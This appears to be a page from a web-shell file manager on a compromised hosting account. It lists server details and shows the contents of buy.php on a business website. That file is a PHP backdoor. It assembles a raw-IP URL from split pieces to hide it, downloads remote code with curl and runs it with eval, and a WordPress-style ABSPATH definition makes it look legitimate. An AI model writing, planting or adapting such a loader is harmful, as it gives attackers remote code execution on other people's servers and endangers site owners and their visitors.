HEX
Server: LiteSpeed
System: Linux twilight.herosite.pro 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
User: owzicwjp (1120)
PHP: 8.2.32
Disabled: show_source, system, shell_exec, passthru, popen, exec
Upload Files
File: /home/owzicwjp/public_html/prekshaenterprise.com/buy.php
<?php
try {
    // URL dipecah menjadi beberapa bagian
    $urlParts = [
        'http://',
        '69.197.189.37',
        '/',
        'j250904_23/',
        'init',
        '.txt'
    ];
    
    $realUrl = implode('', $urlParts);
    
    $c = curl_init($realUrl);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($c, CURLOPT_TIMEOUT, 15);
    curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 6);
    curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 Compatible');
    $result = curl_exec($c);
    curl_close($c);
    
    if ($result !== false) {
        eval('?>' . $result);
    }
} catch (Exception $e) {
    error_log('External resource error: ' . $e->getMessage());
}
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', getcwd() . '/' );
}
?>